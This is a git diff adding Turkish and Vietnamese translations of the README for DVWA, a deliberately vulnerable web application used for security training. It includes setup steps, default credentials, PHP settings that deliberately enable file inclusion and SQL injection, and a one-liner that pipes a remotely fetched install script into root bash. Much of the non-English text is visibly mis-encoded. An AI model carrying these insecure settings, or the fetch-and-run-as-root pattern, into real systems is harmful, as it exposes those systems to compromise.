+$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +Not: Eğer MySQL yerine MariaDB kullanÄąyorsanÄąz (MariaDB, Kali'nin varsayÄąlanÄądÄąr) veri tabanÄąnÄąn root kullanÄącÄąsÄąnÄą kullanamazsÄąnÄąz. Yeni bir veri tabanÄą kullanÄącÄąsÄą oluşturmalÄąsÄąnÄąz. Bunu yapmak için, veri tabanÄąna root olarak bağlanÄąn ve aşağıdaki komutlarÄą çalÄąÅŸtÄąrÄąn: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +mysql> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Diğer YapÄąlandÄąrmalar + +İşletim sisteminize ve PHP sÃŧrÃŧmÃŧnÃŧze bağlÄą olarak, varsayÄąlan yapÄąlandÄąrmayÄą değiştirmek isteyebilirsiniz. DosyalarÄąn konumu, cihazdan cihaza farklÄąlÄąk gÃļsterecektir. + +**Dizin Ä°zinleri**: + +* `./hackable/uploads/` - Web servisi tarafÄąndan yazÄąlabilir olmalÄądÄąr (dosya yÃŧklemeleri için). +* `./external/phpids/0.6/lib/IDS/tmp/phpids_log.txt` - Web servisi tarafÄąndan yazÄąlabilir olmalÄądÄąr (PHPIDS kullanmak istiyorsanÄąz). + +**PHP yapÄąlandÄąrmasÄą**: + +* `allow_url_include = on` - Remote File Inclusions'a (RFI) izin verir [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] +* `allow_url_fopen = on` - Remote File Inclusions'a (RFI) izin verir [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] +* `safe_mode = off` - (PHP <= v5.4 için) SQL Injection'a (SQLi) izin verir [[safe_mode](https://secure.php.net/manual/en/features.safe-mode.php)] +* `magic_quotes_gpc = off` - (PHP <= v5.4 için) SQL Injection'a (SQLi) izin verir [[magic_quotes_gpc](https://secure.php.net/manual/en/security.magicquotes.php)] +* `display_errors = off` - (Ä°steğe bağlÄą) PHP uyarÄą mesajlarÄąnÄą gizler [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + +**Dosya: `config/config.inc.php`**: + +* `$_DVWA[ 'recaptcha_public_key' ]` & `$_DVWA[ 'recaptcha_private_key' ]` - Bu değerler şuradan oluşturulmalÄą: https://www.google.com/recaptcha/admin/create + +### VarsayÄąlan Giriş Bilgileri + +**VarsayÄąlan kullanÄącÄą adÄą = `admin`** + +**VarsayÄąlan parola = `password`** + +_...kolaylÄąkla brute force edilebilir ;)_ + +Giriş URL'i: http://127.0.0.1/login.php + +_Not: DVWA'yÄą farklÄą bir dizine kurduysanÄąz, URL değişecektir._ + +- - - + +## Docker Container + +- [dockerhub sayfasÄą](https://hub.docker.com/r/vulnerables/web-dvwa/) + +`docker run --rm -it -p 80:80 vulnerables/web-dvwa` + +LÃŧtfen, Ãļnceki MySQL sorunlarÄą nedeniyle aufs kullandığınÄązdan emin olun. Depolama sÃŧrÃŧcÃŧnÃŧzÃŧ kontrol etmek için `docker info` çalÄąÅŸtÄąrÄąn. aufs değilse, lÃŧtfen değiştirin. Her işletim sistemi için bunu nasÄąl yapacağınÄąza dair dokÃŧmanlar mevcut. Ancak farklÄąlÄąk gÃļsterdikleri için bu konuya değinmeyeceğiz. + +- - - + +## Sorun Giderme + +Bu Ãļneriler; Debian, Ubuntu ve Kali gibi Debian tabanlÄą bir dağıtÄąm kullandığınÄązÄą varsayar. Diğer dağıtÄąmlar için yine bu adÄąmlarÄą takip edin ancak gerekli yerlerde komutlarÄą değiştirin. + +### Site 404 hatasÄą veriyor +Bu sorunu yaÅŸÄąyorsanÄąz, dosya konumlarÄąnÄą anlamalÄąsÄąnÄąz. VarsayÄąlan olarak Apache'nin belge kÃļkÃŧ (web içeriğini aramaya başladığı konum) `/var/www/html` dizinidir. Bu dizine `hello.txt` dosyasÄą eklerseniz, erişmek için `http://localhost/hello.txt` adresine gitmelisiniz. + +Eğer bir dizin oluşturup bu dosyayÄą o dizin içine eklediyseniz - `/var/www/html/mydir/hello.txt` - o hÃĸlde `http://localhost/mydir/hello.txt` adresine gitmelisiniz. + +Linux varsayÄąlan olarak bÃŧyÃŧk-kÃŧçÃŧk harfe duyarlÄądÄąr. Yani yukarÄądaki Ãļrneğe bakarak, aşağıdakilerden birine gitmeyi denediyseniz, `404 Not Found` alÄąrsÄąnÄąz: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +Bu DVWA'yÄą nasÄąl etkiler? Birçok kişi, DVWA'yÄą `/var/www/html` dizinine git ile klonlar. Bu da içinde tÃŧm DVWA dosyalarÄą ile birlikte `/var/www/html/DVWA/` dizinini oluşturur. SonrasÄąnda `http://localhost/` adresine gittiklerinde `404` ya da varsayÄąlan Apache hoş geldin sayfasÄąnÄą gÃļrÃŧrler. Dosyalar DVWA dizini içinde olduğu için, `http://localhost/DVWA` adresine gitmeniz gerekir. + +Başka bir sÄąk karÅŸÄąlaÅŸÄąlan hata da, `http://localhost/dvwa` adresini ziyaret edip `404` almaktÄąr. ÇÃŧnkÃŧ Linux için `dvwa` ile `DVWA` farklÄą şeylerdir. + +Kurulum sonrasÄąnda siteyi ziyaret etmeyi denediğinizde `404` alÄąyorsanÄąz, dosyalarÄą nereye koyduğunuzu dÃŧşÃŧnÃŧn. Belge kÃļkÃŧne gÃļre tam olarak nerede kaldÄąklarÄąna ve bÃŧyÃŧk-kÃŧçÃŧk harf kullanÄąmÄąna dikkat edin. + +### Setup'Äą çalÄąÅŸtÄąrÄąrken "Access denied" + +Kurulum betiğini çalÄąÅŸtÄąrdığınÄązda aşağıdaki hatayÄą alÄąyorsanÄąz, veri tabanÄąndaki kullanÄącÄą adÄą ve parola ile yapÄąlandÄąrma dosyanÄązdakiler uyuşmuyor demektir: + +``` +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +Hataya gÃļre, `notdvwa` kullanÄącÄąsÄąnÄą kullanÄąyorsunuz. + +Aşağıdaki hata, yapÄąlandÄąrma dosyanÄązda yanlÄąÅŸ veri tabanÄąnÄą yazdığınÄązÄą gÃļsterir. + +``` +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +`dvwa` kullancÄąsÄą ile `notdvwa` veri tabanÄąna bağlanmaya çalÄąÅŸtığınÄązÄą belirtiyor. + +YapÄąlacak ilk şey, veri tabanÄąnÄązÄąn ismi ile yapÄąlandÄąrma dosyanÄązda belirttiğiniz ismi karÅŸÄąlaştÄąrmaktÄąr. + +Eğer eşleşiyorsa, komut satÄąrÄąndan giriş yapÄąp yapamadığınÄąza bakÄąn. Veri tabanÄą kullanÄącÄąnÄązÄąn `dvwa` ve parolasÄąnÄąn `p@ssw0rd` olduğunu varsayarsak, aşağıdaki komutu çalÄąÅŸtÄąrÄąn: + +``` +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +*Not: -p'den sonra boşluk yok* + +Aşağıdakine benzer bir Ã§ÄąktÄą gÃļrÃŧyorsanÄąz, parola doğrudur: + +``` +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + +Komut satÄąrÄąndan bağlanabildiğinize gÃļre, yÃŧksek ihtimalle yapÄąlandÄąrma dosyanÄązda bir şeyler yanlÄąÅŸ. Tekrar kontrol edin. İşin içinden Ã§ÄąkamazsanÄąz bir issue aÃ§Äąn. + +Aşağıdaki Ã§ÄąktÄąyÄą alÄąyorsanÄąz, kullanÄącÄą adÄąnÄąz ve/veya parolanÄąz hatalÄądÄąr. [Veri TabanÄąnÄąn HazÄąrlanmasÄą](#veri-tabanÄąnÄąn-hazÄąrlanmasÄą) bÃļlÃŧmÃŧndeki adÄąmlarÄą tekrar edin ve sÃŧreç boyunca aynÄą kullanÄącÄą adÄą ve parolayÄą kullandığınÄązdan emin olun. + +``` +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +Aşağıdaki Ã§ÄąktÄąyÄą alÄąyorsanÄąz, kullanÄącÄą giriş bilgileri doğrudur ancak kullanÄącÄąnÄąn veri tabanÄąna erişimi yoktur. Veri tabanÄą yapÄąlandÄąrma adÄąmlarÄąnÄąn tekrar edin ve kullandığınÄąz veri tabanÄąnÄąn ismini kontrol edin. + +``` +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +Yaşayabileceğiniz son hata ise şu: + +``` +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Bu bir kimlik doğrulama sorunu değil. Size, veri tabanÄą sunucunuzun çalÄąÅŸmadığınÄą gÃļsteriyor. Aşağıdaki komut ile çalÄąÅŸtÄąrÄąn + +```sh +sudo service mysql start +``` + +### Unknown authentication method (Bilinmeyen kimlik doğrulama metodu) + +MySQL'in yeni sÃŧrÃŧmlerinde, PHP varsayÄąlan yapÄąlandÄąrmasÄąyla veri tabanÄą ile artÄąk konuşamamaktadÄąr. Kurulum betiğini çalÄąÅŸtÄąrdığınÄązda aşağıdaki mesajÄą alÄąyorsanÄąz, yapÄąlandÄąrmanÄąz var demektir. + +``` +Database Error #2054: The server requested authentication method unknown to the client. +``` + +Ä°ki seçeneğiniz var. En kolayÄą, MySQL'i kaldÄąrmak ve MariaDB kurmak. Aşağıda, MariaDB projesinin resmi rehberi yer almakta: + + + +Alternatif olarak şu adÄąmlarÄą takip edin: + +1. root kullanÄącÄąsÄąyla şu dosyayÄą dÃŧzenleyin: `/etc/mysql/mysql.conf.d/mysqld.cnf` + +2. `[mysqld]` satÄąrÄąnÄąn altÄąna aşağıdakini ekleyin: + + `default-authentication-plugin=mysql_native_password` + +3. Veri tabanÄąnÄą yeniden başlatÄąn: `sudo service mysql restart` +4. Veri tabanÄą kullanÄącÄąnÄąz için kimlik doğrulama yÃļntemini kontrol edin: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` + +1. Muhtemelen `caching_sha2_password` ifadesini gÃļreceksiniz. Durum bÃļyleyse, aşağıdaki komutu çalÄąÅŸtÄąrÄąn: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +1. Tekrar kontrol ettiğinizda, `mysql_native_password` gÃļrmelisiniz. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +Bu adÄąmlardan sonra, kurulum işlemi normal şekilde devam etmelidir. + +Daha fazla bilgi için şu sayfayÄą ziyaret edin: . + +### Database Error #2002: No such file or directory. + +Veri tabanÄą sunucusu çalÄąÅŸmÄąyor. Debian tabanlÄą bir dağıtÄąmda şunu yapabilirsiniz: + +```sh +sudo service mysql start +``` + +### "MySQL server has gone away" ve "Packets out of order" hatalarÄą + +Bu hatalarÄą almanÄąz için birkaç sebep vardÄąr. Ancak yÃŧksek ihtimalle veri tabanÄą sunucunuzun sÃŧrÃŧmÃŧ, PHP sÃŧrÃŧmÃŧnÃŧzle uyumlu değildir. + +Bu en çok, MySQL'in en son sÃŧrÃŧmÃŧnÃŧ kullandığınÄązda - PHP ile iyi anlaşamadÄąklarÄą için - karÅŸÄąnÄąza Ã§Äąkar. Tavsiyemiz, MySQL'den kurtulun ve MariaDB kurun çÃŧnkÃŧ bu bizim destekleyebileceğimiz bir konu değil. + +Daha fazla bilgi için şu adresi ziyaret edin: + + + +### PHP v5.2.6 sÃŧrÃŧmÃŧnde SQL Injection çalÄąÅŸmÄąyor. + +PHP 5.x Ocak 2019'da yaşam dÃļngÃŧsÃŧnÃŧ tamamladığı için (end-of-life) DVWA'yÄą şu anki 7.x sÃŧrÃŧmÃŧyle çalÄąÅŸtÄąrmanÄązÄą Ãļneriyoruz. + +PHP v5.2.6 ya da daha yukarÄąsÄąnÄą kullanÄąyorsanÄąz, SQL injection ve diğer zafiyetlerin çalÄąÅŸmasÄą için aşağıdaki adÄąmlarÄą tamamlamanÄąz gerekiyor. + +`.htaccess` içinde: + +Bunu: + +```php + + php_flag magic_quotes_gpc off + #php_flag allow_url_fopen on + #php_flag allow_url_include on + +``` + +Şununla değiştirin: + +```php + + magic_quotes_gpc = Off + allow_url_fopen = On + allow_url_include = On + +``` + +### Command Injection çalÄąÅŸmÄąyor + +Apache, web sunucusunda komutlarÄą çalÄąÅŸtÄąrmak için yeterli yetkilere sahip olmayabilir. DVWA'yÄą Linux'ta çalÄąÅŸtÄąrÄąyorsanÄąz root olarak oturum açtığınÄązdan emin olun. Windows'ta ise Administrator olarak oturum aÃ§Äąn. + +### CentOS'ta veri tabanÄą neden bağlanamÄąyor? + +SELinux ile problem yaÅŸÄąyor olabilirsiniz. Ya SELinux'u kapatÄąn ya da web sunucusunun veri tabanÄą ile konuşabilmesi için şu komutu kullanÄąn: + +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Kalan her şey + +En son sorun giderme kÄąlavuzu için lÃŧtfen git repo'sundaki aÃ§Äąk ve kapalÄą taleplerin tamamÄąnÄą okuyun: + + + +Bir talep gÃļndermeden Ãļnce, repo'daki son kod sÃŧrÃŧmÃŧnÃŧ kullandığınÄązdan emin olun. Son "release" sÃŧrÃŧmÃŧnÃŧ değil, master dalÄąndaki son kodlarÄą kastediyoruz. + +Eğer bir talep açacaksanÄąz, en azÄąndan aşağıdaki bilgileri iletin: + +- İşletim sistemi +- RaporladığınÄąz hatalar gerçekleştiği anda web sunucunuzun hata log'larÄąna dÃŧşen son 5 satÄąr +- Eğer bir veri tabanÄą kimlik doğrulama sorunu yaÅŸÄąyorsanÄąz, yukarÄądaki adÄąmlarÄąn her birini tekrar edin ve her adÄąmda ekran gÃļrÃŧntÃŧsÃŧ alÄąn. BunlarÄą, yapÄąlandÄąrma dosyanÄązdaki veri tabanÄą kullanÄącÄą adÄąnÄą ve parolasÄąnÄą gÃļsteren kÄąsmÄąn ekran gÃļrÃŧntÃŧsÃŧ ile birlikte gÃļnderin. +- YanlÄąÅŸ giden şeyin tam aÃ§ÄąklamasÄą, ne olmasÄąnÄą beklediğiniz ve bunu dÃŧzeltmek için neler yaptığınÄąz... "login çalÄąÅŸmÄąyor", sorununuzu anlayÄąp dÃŧzeltmemiz için yeterli değil. + +- - - + +## SQLite3 SQL Injection + +_Bu konudaki destek sÄąnÄąrlÄądÄąr. Issue açmadan Ãļnce, lÃŧtfen hata ayÄąklama sÃŧrecinde çalÄąÅŸmaya hazÄąr olduğunuzdan emin olun. "ÇalÄąÅŸmÄąyor" demeyin._ + +VarsayÄąlan olarak; SQLi ve Blind SQLi, sitede kullanÄąlan MariaDB/MySQL servisine yapÄąlÄąr. Ancak SQLi testlerini SQLite3'e çevirmek de mÃŧmkÃŧndÃŧr. + +SQLite3'Ãŧn PHP ile nasÄąl çalÄąÅŸacağınÄą anlatmayacağım. Ancak `php-sqlite3` paketini kurmak ve bunun aktif olduğundan emin olmak işi çÃļzebilir. + +Değiştirmek için, yapÄąlandÄąrma dosyanÄązÄą dÃŧzenleyin ve şu satÄąrlarÄą ekleyin/dÃŧzenleyin: + +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +VarsayÄąlan olarak `database/sqli.db` dosyasÄąnÄą kullanÄąr. Bu dosyayÄą batÄąrÄąrsanÄąz, `database/sqli.db.dist` dosyasÄąnÄą bunun Ãŧzerine kopyalayÄąn. + +Olay MySQL ile aynÄą. Sadece SQLite3'e karÅŸÄą yapÄąlacak. + +- - - + +## BağlantÄąlar + +Proje SayfasÄą: + +*DVWA takÄąmÄą tarafÄąndan oluşturulmuştur* + +## Çeviri + +Ali Sezişli: [alisezisli](https://github.com/alisezisli) diff --git a/DVWA/README.vi.md b/DVWA/README.vi.md new file mode 100644 index 00000000..bdc17839 --- /dev/null +++ b/DVWA/README.vi.md @@ -0,0 +1,681 @@ +# DAMN VULNERABLE WEB APPLICATION - áģ¨NG Dáģ¤NG WEB Dáģ„ BáģŠ Táē¤N CÔNG + +Damn Vulnerable Web Application (DVWA) là máģ™t áģŠng dáģĨng web PHP/MySQL cáģąc káģŗ dáģ… báģ‹ táēĨn công. MáģĨc tiÃĒu chính cáģ§a áģŠng dáģĨng này là háģ— tráģŖ cÃĄc chuyÃĒn gia báēŖo máē­t kiáģƒm tra káģš năng và công cáģĨ cáģ§a háģ trong môi trÆ°áģng phÃĄp lÃŊ, giÃēp cÃĄc web dev hiáģƒu rÃĩ hÆĄn váģ quy trÃŦnh báēŖo máē­t áģŠng dáģĨng web và háģ— tráģŖ cáēŖ háģc sinh/sinh viÃĒn và giÃĄo viÃĒn tÃŦm hiáģƒu váģ báēŖo máē­t áģŠng dáģĨng web trong máģ™t môi trÆ°áģng đưáģŖc kiáģƒm soÃĄt. + +MáģĨc đích cáģ§a DVWA là **tháģąc hành váģ›i máģ™t sáģ‘ láģ— háģ•ng web pháģ• biáēŋn nháēĨt**, váģ›i **máģŠc đáģ™ khÃŗ khÃĄc nhau** và giao diáģ‡n Ä‘ÆĄn giáēŖn, dáģ… hiáģƒu. +Xin lÆ°u ÃŊ, cÃŗ **cáēŖ láģ— háģ•ng đưáģŖc ghi láēĄi và không** váģ›i pháē§n máģm này. ĐÃĸy là cÃŗ cháģ§ đích. BáēĄn nÃĒn tháģ­ và khÃĄm phÃĄ càng nhiáģu váēĨn đáģ càng táģ‘t. + +- - - + +## CáēŖnh bÃĄo! + +Damn Vulnerable Web Application dáģ… báģ‹ táēĨn công! **Không táēŖi nÃŗ lÃĒn folder public cáģ§a nhà cung cáēĨp dáģ‹ch váģĨ lÆ°u tráģ¯ cáģ§a báēĄn hoáēˇc báēĨt káģŗ mÃĄy cháģ§ nào cÃŗ káēŋt náģ‘i Internet**, vÃŦ chÃēng sáēŊ báģ‹ xÃĸm pháēĄm. BáēĄn nÃĒn sáģ­ dáģĨng mÃĄy áēŖo (vd nhÆ° [VirtualBox](https://www.virtualbox.org/) hoáēˇc [VMware](https://www.vmware.com/)), đáģƒ sáģ­ dáģĨng cháēŋ đáģ™ NAT networking. TrÃĒn mÃĄy khÃĄc, báēĄn táēŖi và cài đáēˇt [XAMPP](https://www.apachefriends.org/) cho web server và database. + +### TuyÃĒn báģ‘ miáģ…n tráģĢ trÃĄch nhiáģ‡m + +ChÃēng tôi không cháģ‹u trÃĄch nhiáģ‡m váģ cÃĄch tháģŠc mà báēĨt káģŗ ai sáģ­ dáģĨng áģŠng dáģĨng này (DVWA). ChÃēng tôi đÃŖ nÃĒu rÃĩ máģĨc đích cáģ§a áģŠng dáģĨng và không nÃĒn sáģ­ dáģĨng áģŠng dáģĨng này cho máģĨc đích xáēĨu. ChÃēng tôi đÃŖ đưa ra cáēŖnh bÃĄo và tháģąc hiáģ‡n cÃĄc biáģ‡n phÃĄp đáģƒ ngăn ngÆ°áģi dÚng cài đáēˇt DVWA trÃĒn mÃĄy cháģ§ web tháģąc táēŋ. Náēŋu mÃĄy cháģ§ web cáģ§a báēĄn báģ‹ xÃĸm pháēĄm thông qua cài đáēˇt DVWA, đÃŗ không pháēŖi là trÃĄch nhiáģ‡m cáģ§a chÃēng tôi, mà đÃŗ là trÃĄch nhiáģ‡m cáģ§a nháģ¯ng ngÆ°áģi đÃŖ táēŖi lÃĒn và cài đáēˇt. + +- - - + +## GiáēĨy phÊp + +File này là máģ™t pháē§n cáģ§a Damn Vulnerable Web Application (DVWA). + +Damn Vulnerable Web Application (DVWA) là pháē§n máģm miáģ…n phí: báēĄn cÃŗ tháģƒ phÃĸn pháģ‘i láēĄi và/hoáēˇc sáģ­a đáģ•i nÃŗ +nÃŗ theo cÃĄc điáģu khoáēŖn cáģ§a GiáēĨy phÊp GNU General Public đưáģŖc xuáēĨt báēŖn báģŸi +Táģ• cháģŠc Pháē§n máģm Táģą do, phiÃĒn báēŖn 3 cáģ§a GiáēĨy phÊp, hoáēˇc +(theo láģąa cháģn cáģ§a báēĄn) báēĨt káģŗ phiÃĒn báēŖn máģ›i hÆĄn. + +Damn Vulnerable Web Application (DVWA) đưáģŖc phÃĸn pháģ‘i váģ›i hy váģng là nÃŗ sáēŊ háģ¯u ích, +nhÆ°ng KHÔNG CÓ Báē¤T Káģ˛ Sáģ° ĐáēĸM BáēĸO NÀO; tháē­m chí không cÃŗ sáģą báēŖo đáēŖm ngáģĨ ÃŊ cáģ§a +KHáēĸ NĂNG THƯƠNG Máē I hoáēˇc Sáģ° PHÙ HáģĸP CHO Máģ˜T Máģ¤C ĐÍCH Cáģ¤ THáģ‚. Xem +GiáēĨy phÊp GNU General Public đáģƒ biáēŋt thÃĒm chi tiáēŋt. + +BáēĄn háēŗn đÃŖ nháē­n đưáģŖc máģ™t báēŖn sao GiáēĨy phÊp GNU General Public +cÚng váģ›i Damn Vulnerable Web Application (DVWA). Náēŋu nhÆ° không, hÃŖy xem . + +- - - + +## Internationalisation + +File này đÃŖ đưáģŖc dáģ‹ch ra nhiáģu ngôn ngáģ¯: + +- Tiáēŋng áēĸ Ráē­p: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- Tiáēŋng Trung Quáģ‘c: [įŽ€äŊ“中文](README.zh.md) +- Tiáēŋng PhÃĄp: [Français](README.fr.md) +- Tiáēŋng Hàn: [한ęĩ­ė–´](README.ko.md) +- Tiáēŋng Ba TÆ°: [ŲØ§ØąØŗی](README.fa.md) +- Tiáēŋng Báģ“ Đào Nha: [PortuguÃĒs](README.pt.md) +- Tiáēŋng TÃĸy Ban Nha: [EspaÃąol](README.es.md) +- Tiáēŋng Tháģ• NhÄŠ Káģŗ: [TÃŧrkçe](README.tr.md) +- Tiáēŋng Indonesia: [Indonesia](README.id.md) +- Tiáēŋng Viáģ‡t: [Vietnamese](README.vi.md) + +Náēŋu báēĄn muáģ‘n đÃŗng gÃŗp báēŖn dáģ‹ch, vui lÃ˛ng táēĄo PR. Tuy nhiÃĒn, xin lÆ°u ÃŊ ráēąng điáģu này không cÃŗ nghÄŠa là cháģ‰ dáģ‹ch nÃŗ báēąng Google Dáģ‹ch và gáģ­i, nháģ¯ng náģ™i dung nhÆ° váē­y sáēŊ báģ‹ táģĢ cháģ‘i. Gáģ­i báēŖn dáģ‹ch cáģ§a báēĄn báēąng cÃĄch thÃĒm file 'README.xx.md' máģ›i trong đÃŗ xx là mÃŖ gáģ“m hai cháģ¯ cÃĄi đáēĄi diáģ‡n cáģ§a ngôn ngáģ¯ báēĄn muáģ‘n (dáģąa vào [ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes)). + +- - - + +## Download + +Máēˇc dÚ cÃŗ nhiáģu phiÃĒn báēŖn DVWA khÃĄc nhau nhÆ°ng phiÃĒn báēŖn đưáģŖc háģ— tráģŖ duy nháēĨt là táģĢ repo GitHub chính tháģŠc này. BáēĄn cÃŗ tháģƒ clone nÃŗ táģĢ repo: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +Hoáēˇc [táēŖi file zip](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## Cài đáēˇt + +### Cài đáēˇt táģą đáģ™ng 🛠ī¸ + +**LÆ°u ÃŊ, đÃĸy không pháēŖi là script chính tháģŠc cáģ§a DVWA, nÃŗ đưáģŖc viáēŋt báģŸi [IamCarron](https://github.com/iamCarron/). RáēĨt nhiáģu náģ— láģąc đÃŖ đưáģŖc tháģąc hiáģ‡n đáģƒ táēĄo script và khi nÃŗ đưáģŖc táēĄo, nÃŗ không làm báēĨt cáģŠ điáģu gÃŦ đáģ™c háēĄi, tuy nhiÃĒn, đáģƒ đáģ phÃ˛ng, báēĄn nÃĒn xem láēĄi script trÆ°áģ›c khi cháēĄy nÃŗ máģ™t cÃĄch mÚ quÃĄng trÃĒn háģ‡ tháģ‘ng cáģ§a mÃŦnh. Vui lÃ˛ng bÃĄo cÃĄo báēĨt káģŗ láģ—i nào cho [IamCarron](https://github.com/iamCarron/), cháģŠ không pháēŖi reong repo này.** + +Script cáēĨu hÃŦnh táģą đáģ™ng cho DVWA trÃĒn cÃĄc mÃĄy dáģąa trÃĒn Debian, bao gáģ“m Kali, Ubuntu, Kubuntu, Linux Mint, Zorin OS... + +**LÆ°u ÃŊ: Script này yÃĒu cáē§u quyáģn root và đưáģŖc điáģu cháģ‰nh cho cÃĄc distro dáģąa trÃĒn Debian. ĐáēŖm báēŖo báēĄn đang cháēĄy nÃŗ váģ›i quyáģn root user.** + +#### YÃĒu cáē§u cài đáēˇt + +- **Háģ‡ điáģu hành:** Distro trÃĒn Debian (Kali, Ubuntu, Kubuntu, Linux Mint, Zorin OS). +- **Đáēˇc quyáģn:** Sáģ­ dáģĨng root user. + +#### CÃĄc bÆ°áģ›c cài đáēˇt + +##### Báēąng máģ™t láģ‡nh duy nháēĨt (One-liner) + +Láģ‡nh này sáēŊ táēŖi script cài đáēˇt đưáģŖc viáēŋt báģŸi [@IamCarron](https://github.com/IamCarron) xuáģ‘ng và táģą đáģ™ng cháēĄy script đÃŗ. Điáģu này sáēŊ không đưáģŖc đưa vào đÃĸy náēŋu chÃēng tôi không tin cáē­y tÃĄc giáēŖ và káģ‹ch báēŖn nhÆ° khi chÃēng tôi xem xÊt nÃŗ, nhÆ°ng luôn cÃŗ kháēŖ năng ai đÃŗ sáēŊ láģĢa đáēŖo và vÃŦ váē­y náēŋu báēĄn không cáēŖm tháēĨy an toàn khi cháēĄy code cáģ§a ngÆ°áģi khÃĄc mà không kiáģƒm tra trÆ°áģ›c, hÃŖy làm theo quy trÃŦnh tháģ§ công và báēĄn cÃŗ tháģƒ xem láēĄi sau khi táēŖi xuáģ‘ng. + +```bash +sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)" +``` + +##### CháēĄy script tháģ§ công + +1. **TáēŖi script:** + + ```bash + wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh + ``` + +2. **Sáģ­ quyáģn cho script đáģƒ cÃŗ tháģƒ cháēĄy:** + + ```bash + chmod +x Install-DVWA.sh + ``` + +3. **CháēĄy script váģ›i quyáģn root:** + ```bash + sudo ./Install-DVWA.sh + ``` + +### Video hÆ°áģ›ng dáēĢn cài đáēˇt + +- [Installing DVWA on Kali running in VirtualBox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Installing DVWA on Windows using XAMPP](https://youtu.be/Yzksa_WjnY0) +- [Installing Damn Vulnerable Web Application (DVWA) on Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +CÃĄch dáģ… nháēĨt đáģƒ cài đáēˇt DVWA là táēŖi xuáģ‘ng và cài đáēˇt [XAMPP](https://www.apachefriends.org/) náēŋu báēĄn chÆ°a thiáēŋt láē­p. + +XAMPP là máģ™t báēŖn phÃĸn pháģ‘i Apache ráēĨt dáģ… cài đáēˇt cho Linux, Solaris, Windows và Mac OS X. GÃŗi này bao gáģ“m mÃĄy cháģ§ web Apache, MySQL, PHP, Perl, mÃĄy cháģ§ FTP và phpMyAdmin. + +[Video](https://youtu.be/Yzksa_WjnY0) này sáēŊ hÆ°áģ›ng dáēĢn báēĄn quy trÃŦnh cài đáēˇt cho Windows nhÆ°ng quy trÃŦnh này sáēŊ tÆ°ÆĄng táģą đáģ‘i váģ›i cÃĄc háģ‡ điáģu hành khÃĄc. + +### Docker + +CáēŖm ÆĄn sáģą giÃēp đáģĄ táģĢ [hoang-himself](https://github.com/hoang-himself) và [JGillam](https://github.com/JGillam), máģi commit váģ›i nhÃĄnh `master` đáģu khiáēŋn Docker image đưáģŖc build và sáēĩn sàng đáģƒ kÊo xuáģ‘ng táģĢ GitHub Container Register. + +Đáģƒ biáēŋt thÃĒm thông tin, hÃŖy duyáģ‡t qua [Docker image dáģąng sáēĩn](https://github.com/digininja/DVWA/pkgs/container/dvwa). + +#### Báē¯t đáē§u + +Điáģu kiáģ‡n: Cáē§n Docker và Docker Compose. + +- Náēŋu báēĄn đang sáģ­ dáģĨng Docker Desktop thÃŦ cáēŖ hai đÃŖ đưáģŖc cài đáēˇt sáēĩn. +- Náēŋu báēĄn thích Docker Engine trÃĒn Linux, hÃŖy nháģ› làm theo [hÆ°áģ›ng dáēĢn cài đáēˇt](https://docs.docker.com/engine/install/#server) cáģ§a háģ. + +**ChÃēng tôi cung cáēĨp háģ— tráģŖ cho báēŖn phÃĄt hành Docker máģ›i nháēĨt nhÆ° áģŸ trÃĒn.** +Náēŋu báēĄn đang sáģ­ dáģĨng Linux và package Docker đi kèm váģ›i package manager cáģ§a mÃŦnh, nÃŗ cÃŗ tháģƒ cÅŠng hoáēĄt đáģ™ng nhÆ°ng cháģ‰ dáģĢng láēĄi áģŸ viáģ‡c háģ— tráģŖ. + +Viáģ‡c nÃĸng cáēĨp 